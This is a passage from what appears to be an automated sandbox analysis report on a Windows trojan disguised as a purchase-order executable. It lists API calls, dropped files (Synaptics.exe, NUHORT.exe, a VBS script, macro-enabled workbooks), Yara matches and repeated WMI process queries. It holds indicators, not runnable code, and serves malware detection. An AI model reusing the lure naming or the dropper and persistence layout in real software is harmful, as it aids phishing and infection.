                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000729C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,9_2_000729C2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000E02AA NtdllDialogWndProc_W,9_2_000E02AA
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DE769 NtdllDialogWndProc_W,CallWindowProcW,9_2_000DE769
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DEA4E NtdllDialogWndProc_W,9_2_000DEA4E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008AC99 NtdllDialogWndProc_W,9_2_0008AC99
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,9_2_000DECBC
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008AD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,9_2_0008AD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,9_2_000DEFA8
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008AFB4 GetParent,NtdllDialogWndProc_W,9_2_0008AFB4
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF0A1 SendMessageW,NtdllDialogWndProc_W,9_2_000DF0A1
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,9_2_000DF122
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF37C NtdllDialogWndProc_W,9_2_000DF37C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF3AB NtdllDialogWndProc_W,9_2_000DF3AB
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF3DA NtdllDialogWndProc_W,9_2_000DF3DA
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF425 NtdllDialogWndProc_W,9_2_000DF425
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF45A ClientToScreen,NtdllDialogWndProc_W,9_2_000DF45A
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF594 GetWindowLongW,NtdllDialogWndProc_W,9_2_000DF594
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_000DF5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008B7F2 NtdllDialogWndProc_W,9_2_0008B7F2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008B845 NtdllDialogWndProc_W,9_2_0008B845
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DFE80 NtdllDialogWndProc_W,9_2_000DFE80
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,9_2_000DFF04
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,9_2_000DFF91
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE70AE: CreateFileW,DeviceIoControl,CloseHandle,1_2_00EE70AE
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EDB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74AF5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,1_2_00EDB9F1
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00EE82D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000B82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,9_2_000B82D0
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: String function: 00097750 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: String function: 0008F885 appears 67 times
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: String function: 00EBF885 appears 67 times
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: String function: 00EC7750 appears 42 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 23736
                                Source: New PO - Supplier 0202AW-PER2.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: New PO - Supplier 0202AW-PER2.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCX76FB.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ~$cache1.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681270793.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689890104.00000000007B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNames lpcR vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689890104.00000000007B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689890104.00000000007A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000002.1690265415.00000000007AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exeBinary or memory string: OriginalFileName vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exeBinary or memory string: OriginalFilenameb! vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@26/51@22/4
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe | Code function: 1_2_00EED712 GetLastError,FormatMessageW,1_2_00EED712
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe | Code function: 1_2_00EDB8B0 AdjustTokenPrivileges,CloseHandle,1_2_00EDB8B0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe | Code function: 1_2_00EDBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00EDBEC3
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | Code function: 9_2_000AB8B0 AdjustTokenPrivileges,CloseHandle,9_2_000AB8B0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe | Code function: 9_2_000ABEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_000ABEC3
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe | Code function: 1_2_00EEEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_00EEEA85
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe | Code function: 1_2_00EE6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,1_2_00EE6F5B
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe | Code function: 1_2_00EEEFCD CoInitialize,CoCreateInstance,CoUninitialize,1_2_00EEEFCD
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe | Code function: 1_2_00EA31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_00EA31F2
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe | File created: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_03
                                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4076
                                Source: C:\ProgramData\Synaptics\Synaptics.exe | Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe | File created: C:\Users\user\AppData\Local\Temp\QHCPYO.vbs
                                Source: Yara match | File source: New PO - Supplier 0202AW-PER2.exe, type: SAMPLE
                                Source: Yara match | File source: 0.0.New PO - Supplier 0202AW-PER2.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara match | File source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara match | File source: C:\ProgramData\Synaptics\RCX76FB.tmp, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe | Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\ProgramData\Synaptics\Synaptics.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
